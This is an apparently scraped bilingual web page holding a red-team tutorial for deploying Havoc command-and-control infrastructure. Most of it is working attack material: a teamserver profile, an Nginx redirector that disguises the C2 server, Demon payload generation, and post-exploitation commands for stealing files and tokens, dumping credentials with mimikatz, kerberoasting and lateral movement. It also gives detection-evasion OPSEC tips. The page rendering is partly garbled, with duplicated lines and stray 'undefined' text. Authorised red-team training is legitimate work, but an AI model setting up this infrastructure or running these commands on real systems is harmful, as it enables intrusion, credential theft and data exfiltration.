Back to Details

building-red-team-c2-infrastructure-with-havoc

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

Building Red Team C2 Infrastructure with Havoc

基于Havoc搭建红队C2基础设施

Overview

概述

Havoc is a modern, open-source post-exploitation command and control (C2) framework created by C5pider. It provides a collaborative multi-operator interface similar to Cobalt Strike, featuring the Demon agent for Windows post-exploitation, customizable profiles for traffic malleable configurations, and support for HTTP/HTTPS/SMB listeners. This skill covers deploying production-grade Havoc C2 infrastructure with proper OPSEC considerations for authorized red team engagements.
Havoc是由C5pider开发的现代开源后渗透测试命令与控制(C2)框架。它提供了类似Cobalt Strike的协作式多操作员界面,具备用于Windows后渗透的Demon agent、可自定义的流量变形配置文件,以及对HTTP/HTTPS/SMB监听器的支持。本技能介绍了如何部署符合OPSEC要求的生产级Havoc C2基础设施,用于授权的红队演练。

When to Use

适用场景

  • When deploying or configuring building red team c2 infrastructure with havoc capabilities in your environment
  • When establishing security controls aligned to compliance requirements
  • When building or improving security architecture for this domain
  • When conducting security assessments that require this implementation
  • 在你的环境中部署或配置具备Havoc能力的红队C2基础设施时
  • 建立符合合规要求的安全控制措施时
  • 构建或改进该领域的安全架构时
  • 开展需要此类实施的安全评估时

Prerequisites

前置条件

  • Ubuntu 22.04 LTS or Debian 11+ (for Teamserver)
  • Kali Linux 2023+ (for Client)
  • VPS providers: DigitalOcean, Linode, or AWS EC2 (minimum 2GB RAM, 2 vCPU)
  • Domain name aged 30+ days with valid SSL certificate
  • Written authorization for red team engagement
  • Ubuntu 22.04 LTS或Debian 11+(用于Teamserver)
  • Kali Linux 2023+(用于客户端)
  • VPS提供商:DigitalOcean、Linode或AWS EC2(最低2GB内存,2核CPU)
  • 注册时长30天以上的域名,并配有有效的SSL证书
  • 红队演练的书面授权文件

Architecture

架构

┌──────────────────────────────────────────────────────────────┐
│                    HAVOC C2 ARCHITECTURE                      │
├──────────────────────────────────────────────────────────────┤
│                                                               │
│  ┌──────────┐     ┌──────────────┐     ┌──────────────────┐ │
│  │  Havoc    │────▶│  HTTPS       │────▶│  Target Network  │ │
│  │  Client   │     │  Redirector  │     │  (Demon Agent)   │ │
│  │  (Kali)   │     │  (Nginx/CDN) │     │                  │ │
│  └──────────┘     └──────────────┘     └──────────────────┘ │
│       │                   │                                   │
│       │           ┌──────────────┐                            │
│       └──────────▶│  Havoc       │                            │
│                   │  Teamserver  │                            │
│                   │  (Ubuntu VPS)│                            │
│                   │  Port 40056  │                            │
│                   └──────────────┘                            │
│                                                               │
└──────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────┐
│                    HAVOC C2 ARCHITECTURE                      │
├──────────────────────────────────────────────────────────────┤
│                                                               │
│  ┌──────────┐     ┌──────────────┐     ┌──────────────────┐ │
│  │  Havoc    │────▶│  HTTPS       │────▶│  Target Network  │ │
│  │  Client   │     │  Redirector  │     │  (Demon Agent)   │ │
│  │  (Kali)   │     │  (Nginx/CDN) │     │                  │ │
│  └──────────┘     └──────────────┘     └──────────────────┘ │
│       │                   │                                   │
│       │           ┌──────────────┐                            │
│       └──────────▶│  Havoc       │                            │
│                   │  Teamserver  │                            │
│                   │  (Ubuntu VPS)│                            │
│                   │  Port 40056  │                            │
│                   └──────────────┘                            │
│                                                               │
└──────────────────────────────────────────────────────────────┘

Step 1: Install Havoc Teamserver

步骤1:安装Havoc Teamserver

bash
undefined
bash
undefined

Clone the Havoc repository

Clone the Havoc repository

git clone https://github.com/HavocFramework/Havoc.git cd Havoc
git clone https://github.com/HavocFramework/Havoc.git cd Havoc

Install dependencies (Ubuntu 22.04)

Install dependencies (Ubuntu 22.04)

sudo apt update sudo apt install -y git build-essential apt-utils cmake libfontconfig1
libglu1-mesa-dev libgtest-dev libspdlog-dev libboost-all-dev
libncurses5-dev libgdbm-dev libssl-dev libreadline-dev libffi-dev
libsqlite3-dev libbz2-dev mesa-common-dev qtbase5-dev qtchooser
qt5-qmake qtbase5-dev-tools libqt5websockets5 libqt5websockets5-dev
qtdeclarative5-dev golang-go qtbase5-dev libqt5websockets5-dev
python3-dev libboost-all-dev mingw-w64 nasm
sudo apt update sudo apt install -y git build-essential apt-utils cmake libfontconfig1
libglu1-mesa-dev libgtest-dev libspdlog-dev libboost-all-dev
libncurses5-dev libgdbm-dev libssl-dev libreadline-dev libffi-dev
libsqlite3-dev libbz2-dev mesa-common-dev qtbase5-dev qtchooser
qt5-qmake qtbase5-dev-tools libqt5websockets5 libqt5websockets5-dev
qtdeclarative5-dev golang-go qtbase5-dev libqt5websockets5-dev
python3-dev libboost-all-dev mingw-w64 nasm

Build the Teamserver

Build the Teamserver

cd teamserver go mod download golang.org/x/sys go mod download github.com/ugorji/go cd .. make ts-build
cd teamserver go mod download golang.org/x/sys go mod download github.com/ugorji/go cd .. make ts-build

Build the Client

Build the Client

make client-build
undefined
make client-build
undefined

Step 2: Configure Teamserver Profile

步骤2:配置Teamserver配置文件

Create the Havoc profile (
havoc.yaotl
):
hcl
Teamserver {
    Host = "0.0.0.0"
    Port = 40056

    Build {
        Compiler64 = "/usr/bin/x86_64-w64-mingw32-gcc"
        Compiler86 = "/usr/bin/i686-w64-mingw32-gcc"
        Nasm = "/usr/bin/nasm"
    }
}

Operators {
    user "operator1" {
        Password = "Str0ngP@ssw0rd!"
    }
    user "operator2" {
        Password = "An0th3rP@ss!"
    }
}

Listeners {
    Http {
        Name         = "HTTPS Listener"
        Hosts        = ["c2.yourdomain.com"]
        HostBind     = "0.0.0.0"
        HostRotation = "round-robin"
        PortBind     = 443
        PortConn     = 443
        Secure       = true
        UserAgent    = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

        Uris = [
            "/api/v2/auth",
            "/api/v2/status",
            "/content/images/gallery",
        ]

        Headers = [
            "X-Requested-With: XMLHttpRequest",
            "Content-Type: application/json",
        ]

        Response {
            Headers = [
                "Content-Type: application/json",
                "Server: nginx/1.24.0",
                "X-Frame-Options: DENY",
            ]
        }
    }
}

Demon {
    Sleep  = 10
    Jitter = 30

    TrustXForwardedFor = false

    Injection {
        Spawn64 = "C:\\Windows\\System32\\notepad.exe"
        Spawn32 = "C:\\Windows\\SysWOW64\\notepad.exe"
    }
}
创建Havoc配置文件(
havoc.yaotl
):
hcl
Teamserver {
    Host = "0.0.0.0"
    Port = 40056

    Build {
        Compiler64 = "/usr/bin/x86_64-w64-mingw32-gcc"
        Compiler86 = "/usr/bin/i686-w64-mingw32-gcc"
        Nasm = "/usr/bin/nasm"
    }
}

Operators {
    user "operator1" {
        Password = "Str0ngP@ssw0rd!"
    }
    user "operator2" {
        Password = "An0th3rP@ss!"
    }
}

Listeners {
    Http {
        Name         = "HTTPS Listener"
        Hosts        = ["c2.yourdomain.com"]
        HostBind     = "0.0.0.0"
        HostRotation = "round-robin"
        PortBind     = 443
        PortConn     = 443
        Secure       = true
        UserAgent    = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

        Uris = [
            "/api/v2/auth",
            "/api/v2/status",
            "/content/images/gallery",
        ]

        Headers = [
            "X-Requested-With: XMLHttpRequest",
            "Content-Type: application/json",
        ]

        Response {
            Headers = [
                "Content-Type: application/json",
                "Server: nginx/1.24.0",
                "X-Frame-Options: DENY",
            ]
        }
    }
}

Demon {
    Sleep  = 10
    Jitter = 30

    TrustXForwardedFor = false

    Injection {
        Spawn64 = "C:\\Windows\\System32\\notepad.exe"
        Spawn32 = "C:\\Windows\\SysWOW64\\notepad.exe"
    }
}

Step 3: Start Teamserver

步骤3:启动Teamserver

bash
undefined
bash
undefined

Start the Havoc Teamserver with the profile

Start the Havoc Teamserver with the profile

./havoc server --profile ./profiles/havoc.yaotl -v
./havoc server --profile ./profiles/havoc.yaotl -v

Expected output:

Expected output:

[*] Havoc Framework [Version: 0.7]

[*] Havoc Framework [Version: 0.7]

[*] Teamserver started on: 0.0.0.0:40056

[*] Teamserver started on: 0.0.0.0:40056

[*] HTTPS Listener started on: 0.0.0.0:443

[*] HTTPS Listener started on: 0.0.0.0:443

undefined
undefined

Step 4: Configure HTTPS Redirector

步骤4:配置HTTPS重定向器

Set up an Nginx reverse proxy on a separate VPS as a redirector:
nginx
undefined
在独立VPS上设置Nginx反向代理作为重定向器:
nginx
undefined

/etc/nginx/sites-available/c2-redirector

/etc/nginx/sites-available/c2-redirector

server { listen 443 ssl; server_name c2.yourdomain.com;
ssl_certificate /etc/letsencrypt/live/c2.yourdomain.com/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/c2.yourdomain.com/privkey.pem;

# Only forward traffic matching C2 URIs
location /api/v2/auth {
    proxy_pass https://TEAMSERVER_IP:443;
    proxy_ssl_verify off;
    proxy_set_header Host $host;
    proxy_set_header X-Forwarded-For $remote_addr;
}

location /api/v2/status {
    proxy_pass https://TEAMSERVER_IP:443;
    proxy_ssl_verify off;
    proxy_set_header Host $host;
}

location /content/images/gallery {
    proxy_pass https://TEAMSERVER_IP:443;
    proxy_ssl_verify off;
    proxy_set_header Host $host;
}

# Redirect all other traffic to legitimate site
location / {
    return 301 https://www.microsoft.com;
}
}
undefined
server { listen 443 ssl; server_name c2.yourdomain.com;
ssl_certificate /etc/letsencrypt/live/c2.yourdomain.com/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/c2.yourdomain.com/privkey.pem;

# Only forward traffic matching C2 URIs
location /api/v2/auth {
    proxy_pass https://TEAMSERVER_IP:443;
    proxy_ssl_verify off;
    proxy_set_header Host $host;
    proxy_set_header X-Forwarded-For $remote_addr;
}

location /api/v2/status {
    proxy_pass https://TEAMSERVER_IP:443;
    proxy_ssl_verify off;
    proxy_set_header Host $host;
}

location /content/images/gallery {
    proxy_pass https://TEAMSERVER_IP:443;
    proxy_ssl_verify off;
    proxy_set_header Host $host;
}

# Redirect all other traffic to legitimate site
location / {
    return 301 https://www.microsoft.com;
}
}
undefined

Step 5: Generate Demon Payload

步骤5:生成Demon载荷

bash
undefined
bash
undefined

Via the Havoc Client GUI:

Via the Havoc Client GUI:

Attack > Payload

Attack > Payload

Agent: Demon

Agent: Demon

Listener: HTTPS Listener

Listener: HTTPS Listener

Arch: x64

Arch: x64

Format: Windows Exe / Windows Shellcode

Format: Windows Exe / Windows Shellcode

Sleep Technique: WaitForSingleObjectEx (Ekko)

Sleep Technique: WaitForSingleObjectEx (Ekko)

Spawn: C:\Windows\System32\notepad.exe

Spawn: C:\Windows\System32\notepad.exe

The generated Demon payload connects back through:

The generated Demon payload connects back through:

Target -> Redirector (Nginx) -> Teamserver

Target -> Redirector (Nginx) -> Teamserver

undefined
undefined

Step 6: Post-Exploitation with Demon

步骤6:使用Demon进行后渗透测试

Once a Demon session checks in, common post-exploitation commands:
undefined
当Demon会话上线后,常用的后渗透命令:
undefined

Session interaction

Session interaction

demon> whoami demon> shell systeminfo demon> shell ipconfig /all
demon> whoami demon> shell systeminfo demon> shell ipconfig /all

Process listing

Process listing

demon> proc list
demon> proc list

File operations

File operations

demon> download C:\Users\target\Documents\sensitive.docx demon> upload /tools/Rubeus.exe C:\Windows\Temp\r.exe
demon> download C:\Users\target\Documents\sensitive.docx demon> upload /tools/Rubeus.exe C:\Windows\Temp\r.exe

In-memory .NET execution (no disk touch)

In-memory .NET execution (no disk touch)

demon> dotnet inline-execute /tools/Seatbelt.exe -group=all demon> dotnet inline-execute /tools/SharpHound.exe -c All
demon> dotnet inline-execute /tools/Seatbelt.exe -group=all demon> dotnet inline-execute /tools/SharpHound.exe -c All

Token manipulation

Token manipulation

demon> token steal <PID> demon> token make DOMAIN\user password
demon> token steal <PID> demon> token make DOMAIN\user password

Credential access

Credential access

demon> mimikatz sekurlsa::logonpasswords demon> dotnet inline-execute /tools/Rubeus.exe kerberoast
demon> mimikatz sekurlsa::logonpasswords demon> dotnet inline-execute /tools/Rubeus.exe kerberoast

Lateral movement

Lateral movement

demon> jump psexec TARGET_HOST HTTPS_LISTENER demon> jump winrm TARGET_HOST HTTPS_LISTENER
demon> jump psexec TARGET_HOST HTTPS_LISTENER demon> jump winrm TARGET_HOST HTTPS_LISTENER

Pivoting

Pivoting

demon> socks start 1080 demon> rportfwd start 8080 TARGET_INTERNAL 80
undefined
demon> socks start 1080 demon> rportfwd start 8080 TARGET_INTERNAL 80
undefined

OPSEC Considerations

OPSEC注意事项

AspectRecommendation
Domain AgeRegister domains 30+ days before engagement
SSL CertificatesUse Let's Encrypt or purchased certificates, never self-signed
CategorizationSubmit domain to Bluecoat/Fortiguard for categorization
Sleep/JitterMinimum 10s sleep with 30%+ jitter for long-haul operations
User-AgentMatch target organization's common browser user-agent
Kill DateSet payload expiration to engagement end date
InfrastructureSeparate teamserver, redirector, and phishing infrastructure
Payload FormatUse shellcode with custom loader instead of raw EXE
方面建议
域名时长提前30天以上注册域名用于演练
SSL证书使用Let's Encrypt或付费证书,切勿使用自签名证书
域名分类将域名提交至Bluecoat/Fortiguard进行分类
休眠/抖动长期操作时,休眠时间至少10秒,抖动率30%以上
用户代理匹配目标组织常用的浏览器用户代理
失效日期将载荷过期时间设置为演练结束日期
基础设施分离Teamserver、重定向器和钓鱼基础设施
载荷格式使用带自定义加载器的shellcode,而非原始EXE

MITRE ATT&CK Mapping

MITRE ATT&CK映射

Technique IDNamePhase
T1583.001Acquire Infrastructure: DomainsResource Development
T1583.003Acquire Infrastructure: Virtual Private ServerResource Development
T1587.001Develop Capabilities: MalwareResource Development
T1071.001Application Layer Protocol: Web ProtocolsCommand and Control
T1573.002Encrypted Channel: Asymmetric CryptographyCommand and Control
T1090.002Proxy: External ProxyCommand and Control
T1105Ingress Tool TransferCommand and Control
T1055Process InjectionDefense Evasion
技术ID名称阶段
T1583.001获取基础设施:域名资源开发
T1583.003获取基础设施:虚拟专用服务器资源开发
T1587.001开发能力:恶意软件资源开发
T1071.001应用层协议:Web协议命令与控制
T1573.002加密信道:非对称加密命令与控制
T1090.002代理:外部代理命令与控制
T1105传入工具传输命令与控制
T1055进程注入防御规避

References

参考资料